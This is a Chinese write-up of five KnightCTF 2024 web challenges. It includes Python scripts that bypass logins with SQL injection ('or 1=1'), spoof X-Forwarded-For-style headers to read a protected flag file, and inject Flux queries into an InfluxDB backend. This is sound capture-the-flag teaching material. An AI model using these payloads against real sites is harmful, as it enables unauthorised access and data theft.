首页 > 其他分享 >KnightCTF 2024 WEB做题记录

KnightCTF 2024 WEB做题记录

时间:2024-01-23 17:00:43浏览次数:35  
标签:WEB URL req 2024 base 做题 post data requests

WEB

Levi Ackerman

题目信息

Levi Ackerman is a robot! 

N:B: There is no need to do bruteforce. 

Author: saif

Target : http://66.228.53.87:5000/

我的解答:

签到题,题目提示了robot!

直接访问robots.txt得到路径

Disallow : /l3v1_4ck3rm4n.html

再次访问路径得到flag

KCTF{1m_d01n6_17_b3c4u53_1_h4v3_70}

Kitty

题目

Tetanus is a serious, potentially life-threatening infection that can be transmitted by an animal bite. 

N:B: There is no need to do bruteforce. 

Author: Munazir (YCF)

Target : http://45.33.123.243:5020/

我的解答:

弱口令?试一下admin不对,查看源代码js发现

Dashboard查看源代码修改if语句的信息即可:"cat flag.txt"

即可得到flag

或者用SQL绕一下

import requests

session = requests.Session()

base_URL = 'http://45.33.123.243:5020/'

login_data = {
    'username': 'yes',
    'password': '" or 1=1; -- "'
}

req = session.post(f'{base_URL}login', json=login_data)

req = session.get(f'{base_URL}dashboard')

print(req.text)

这样就可以绕过登录名得到

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Modern Dashboard</title>
    <link rel="stylesheet" href="/static/dashboard.css">
</head>
<body>

<div class="container">
    <header>
        <h1>Welcome to the Dashboard</h1>
    </header>

    <section class="content">
        <h2>Latest Posts</h2>
        <div class="post">
            <h3>Post Title 1</h3>
            <p>This is some content for the first post.</p>
        </div>
        <div class="post">
            <h3>Post Title 2</h3>
            <p>This is some content for the second post.</p>
        </div>
        <div class="post">
            <h3>Post Title 3</h3>
            <p>This is some content for the third post.</p>
        </div>
        <!-- You can add more posts dynamically here -->
    </section>

    <section class="posts">
        <form id="postsForm" onsubmit="addPost(event)">
            <label for="post_input">Enter Post:</label><br>
            <input type="text" id="post_input" name="post_input">
            <button type="submit">Execute</button>
        </form>
    </section>
</div>

<script>
    function addPost(event) {
        event.preventDefault();
        const post_in = document.getElementById('post_input').value;

        if (post_in.startsWith('cat flag.txt')) {
            fetch('/execute', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded'
                },
                body: `post_input=${encodeURIComponent(post_in)}`
            })
            .then(response => response.text())
            .then(result => {
                const contentSection = document.querySelector('.content');
                const newPost = document.createElement('div');
                newPost.classList.add('post');
                newPost.innerHTML = `<h3>Flag Post</h3><p>${result}</p>`;
                contentSection.appendChild(newPost);
            });
        } else {
            const contentSection = document.querySelector('.content');
            const newPost = document.createElement('div');
            newPost.classList.add('post');
            newPost.innerHTML = `<h3>User Post</h3><p>${post_in}</p>`;
            contentSection.appendChild(newPost);
        }
    }
</script>

</body>
</html>

然后修改脚本获取flag

import requests

session = requests.Session()

base_URL = 'http://45.33.123.243:5020/'

# forms data with sql injection
login_data = {
    'username': 'yes',
    'password': '" or 1=1; -- "'
}

# Login to get access to dashboard
req = session.post(f'{base_URL}login', json=login_data)

# Set params
payload = {'post_input': 'cat flag.txt'}
headers = {'Content-Type': 'application/x-www-form-urlencoded'}

# Retrieve flag
req = session.post(f'{base_URL}execute', data=payload, headers=headers)

print(req.text)
#KCTF{Fram3S_n3vE9_L1e_4_toGEtH3R}

Gain Access 1

题目信息

The web challenges are very much similar to real life application bugs. This is going to be a series of Gain Access with 3 challenges unlocks upon solving one by one. By solving these challenges, you'll gain a practical knowledge of Authentication Bypass Vulnerabilites as well as business logic error. The only difference is you'll not get any bounty but you'll get flags. Give it a try. And keep in mind, Don't make it hard, keep it simple. All the best. Solve the challenges & be a cyber knight. 

No need to bruteforce. There's a rate limit. If you send continuous requests, you'll be blocked for 3 minutes.

Author: 0xt4req

Target : http://45.33.123.243:13556/

我的解答:

访问得到:

控制台发现账号: [email protected] 

扫后台发现有个robots.txt

访问得到路径:/r3s3t_pa5s.php

进入出现提示:No token provided.

这里我们需要获取到token。。。。抓包吧!

在忘记密码的地方把邮箱输进去进行提交抓包得到token

然后我们继续回到/r3s3t_pa5s.php输入这个token便可重建密码

完成后会提示:Password Updated Succesfully.

再次登录进去就会发现flag。。。

或者我们也可以绕过password参数

exp:

import requests

session = requests.Session()

base_URL = 'http://45.33.123.243:13556/'

req = session.get(f'{base_URL}')

login_data = {
    'admin_email': '[email protected]',
    'admin_password': "' or 1=1; -- ",
    'submit_btn': "Submit"
}

req = session.post(f'{base_URL}index.php', data=login_data)

print(req.text)

#KCTF{ACc0uNT_tAk3Over}

README

题目信息

Read me if you can!!

N:B: There is no need to do bruteforce. 

Author: saif

Target : http://66.228.53.87:8989/

我的解答:

输入字段读取文件。。。写个脚本读取

import requests

base_URL = 'http://66.228.53.87:8989/'

file = "text.txt"

req = requests.get(f'{base_URL}fetch?file={file}')

print(req.text)
#{"result":"Yes! You can read files! Dont ask for hint its ezz!!"}

读取flag.txt得到错误

{"result":"403 Access Denied"}

我们需要绕过这个错误(本地读取即可)

import requests

base_URL = 'http://66.228.53.87:8989/'

file_path = "flag.txt"

# headers to bypass 403 Access Denied error
headers = {
    'X-Originating-IP': '127.0.0.1',
    'X-Forwarded-For': '127.0.0.1',
    'X-Forwarded': '127.0.0.1',
    'Forwarded-For': '127.0.0.1',
    'X-Remote-IP': '127.0.0.1',
    'X-Remote-Addr': '127.0.0.1',
    'X-ProxyUser-Ip': '127.0.0.1',
    'X-Original-URL': '127.0.0.1',
    'Client-IP': '127.0.0.1',
    'True-Client-IP': '127.0.0.1',
    'Cluster-Client-IP': '127.0.0.1',
    'X-ProxyUser-Ip': '127.0.0.1',
    'Host': 'localhost'
}

req = requests.get(f'{base_URL}fetch?file={file_path}', headers=headers)

print(req.text)
#{"result":"KCTF{kud05w3lld0n3!}"}

Fluxx

题目信息

Recently I have made a simple app for monitoring and analyzing metrics, events, and real-time data.I used a database which is designed for handling high volumes of timestamped data. But I think its vulnerable find it and get he flag.

To be noted: The challenge resets after sometime. So please wait for a while if you see any error. 

Author: saif

Target : http://66.228.53.87:9001/

我的解答:

访问网站

Please visit /query?data= to travel with time.

简单发送一下数据试试

import requests

base_URL = 'http://66.228.53.87:9001/'

data = '1" OR 1=1--'

req = requests.get(f'{base_URL}query?data={data}')

print(req.text)

得到信息

HttpError: compilation failed: error @1:82-1:158: expected RPAREN, got EOF

error @1:152-1:153: invalid expression @1:151-1:152: =

error @1:155-1:158: got unexpected token in string expression @1:158-1:158: EOF

根据题目信息自行搜索发现一篇参考文章介绍了这个错误:https://community.influxdata.com/t/query-throws-rparen-got-eof-error/18940

新知识:InfluxDB nosql注入 可参考:https://rafa.hashnode.dev/influxdb-nosql-injection

") |> yield(name: "1337") 
buckets() |> filter(fn: (r) => r.name =~ /^a.*/ and die(msg:r.name)) 
//

爆破exp:

import requests, urllib.parse

base_URL = 'http://66.228.53.87:9001/'

letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

for char in list(letters):

    payload = f'") |> yield(name: "1337")\nbuckets() |> filter(fn: (r) => r.name =~ /^{char}.*/ and die(msg:r.name))\n//'

    encoded_payload = urllib.parse.quote(payload, safe='')
    req = requests.get(f'{base_URL}query?data={encoded_payload}')

    if req.text != '[]':
        print(req.text)

#KCTF{g0UPqVWa0eUT2wF2ipzX3v5pxikvqYhxR9OL}

 

标签:WEB,URL,req,2024,base,做题,post,data,requests
From: https://www.cnblogs.com/mumuhhh/p/17982873

相关文章

  • 2024.1.23-每日进度笔记
    今天,我尝试在mysql插入数据后获取自增字段的值。 参考:百度文心一言的回复。 publicstaticintinsertTimu(StringtimuLeixing,StringtimuWenti,StringtimuDaan,StringtimuXuanxiang)throwsException{intres=0;Connectionconnection=uti......
  • 2024-1-23URL概念
    目录URL什么是URLURL解析URL什么是URL定义:统一资源定位符,简明点就是网址,是因特网上标准的资源的地址,如同在网络上的门牌。概念:URL就是统一资源定位符,简称网址,用于访问网络上的资源。URL解析URL的组成部分是由协议、域名、资源路径组成例子网站如下http://hmajax.itheima.......
  • 多系统萎缩2024最新治疗攻略知道吗?我知道,原来要这样!
    一、引言多系统萎缩(MultipleSystemAtrophy,MSA)是一种罕见的神经系统退行性疾病,其特征在于多个系统的萎缩和功能衰退。这包括运动系统、自主神经系统以及某些认知功能。由于其复杂的病理生理机制和临床表现,多系统萎缩的治疗一直是一个挑战。本攻略旨在为多系统萎缩患者、家属和医疗......
  • 2024年深圳市各住房公积金管理中心地址及电话
    1、深圳市住房公积金管理中心坪山区公积金服务专窗区域:深圳市坪山区类别:公积金中心地址:广东省深圳市坪山区金牛路12号启兴大厦电话:0755-123292、深圳市住房公积金管理中心龙华区公积金服务专窗区域:深圳市龙华区类别:公积金中心地址:广东省深圳市龙华......
  • 2024-1-23AJAX的概念
    目录AJAX的概念小知识点箭头函数AJAX的作用axios的使用AJAX的概念简单可以理解为想指定的url获取指定的数据。小知识点箭头函数箭头函数是一种新的函数语法,旨在提供一种更简洁的方式来编写函数。它与传统的function相比比较容易传统函数格式varsum=function(a,b){r......
  • Java web的过滤器Filter
    注:来自《JavaWeb入门经典》一书,仅供参考和学习。1.过滤器的核心对象2.创建并配置过滤器......
  • 2024年世界经济论坛年会,人工智能议题引发热议
    2024年1月15日至19日,瑞士达沃斯举办了第54届世界经济论坛年会。此次论坛汇聚了来自120个国家的2800多位各界领导者,共同探讨和推动国际合作,围绕“重建信任”这一主题讨论经济增长、气候与自然行动、能源安全、技术治理和人类发展等重要议题。论坛设置了包括世界安全合作、创造就业机......
  • 2024.1.23日报
    今天继续完成spark实验,已经是最后一个了关于这次的数据集,用到的是adult.data和adult.test两个两个数据集都要进行一下预处理首先就是删除最后的空行,然后test文件第一行数据格式有问题,删掉另外就是test文件每行最后有个.,可以采用把所有的K.替换成为K的方式处理完之后上传到hd......
  • 2024 THUPC 初赛
    队伍名:TZOI。队员:yts,zhy,以及我一个拖后腿的。光我TZ义不容辞!Day-1随便点开一个THUPC的讨论或者游记,几乎每个队都有大神。进了比赛的交流群,一进群就看到了几个洛谷里的老面孔,比如gza等。其中很多人还是实力不弱的。可想而知,这会是一场恶战。但我相信我们队绝对还是一支相当......
  • 浅析vue cli的webpack配置属性 devServer 详解 和 devServer.proxy 工作原理解析
    浅析vuecli的webpack配置属性devServer详解和devServer.proxy工作原理解析:https://blog.csdn.net/qq_47443027/article/details/125985081?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-125985081-blog-127746519.235^v......